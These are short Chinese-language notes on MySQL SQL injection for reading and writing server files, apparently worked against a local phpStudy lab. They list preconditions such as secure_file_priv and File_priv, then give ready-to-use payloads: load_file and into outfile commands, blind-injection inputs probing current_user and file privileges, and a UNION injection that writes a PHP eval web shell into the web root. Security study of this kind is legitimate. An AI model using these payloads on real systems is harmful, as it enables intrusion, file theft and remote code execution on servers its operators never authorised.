SQL注入读写文件的根本条件:
1. 数据库允许导入导出(secure_file_priv)
2. 当前用户用户文件操作权限(File_priv)
(select 1,2,%40%40global.secure_file_priv%23) %40为@
load_file()读文件 into outfile / into dumpfile写文件 条件:
1.对web目录具有读写权限
2. 知道文件绝对路径
3. 能够使用联合查询(sql注入时)
命令: select load_file('d:/phpstudy/www/anyun.php');
select 'anyun' into outfile 'd:/phpstudy/www/anyun.php';
(例)盲注:
查询当前用户:
id输入:1')) and length(current_user())>10%23
id输入:1')) and length(current_user())=14%23 正确
id输入:1')) and substr(current_user(),1) = 'root%40localhost'%23
查询当前用户是否有文件读写权限:
id输入:1')) and (select File_priv from mysql.user where user='root' and host='localhost')='Y'%23
id输入:1')) order by 3%23 正确
id输入:1')) union select 1,2,'<?php @eval($_POST[a]);?>' into outfile 'c:/phpStudy/WWW/abc.php'%23 植入木马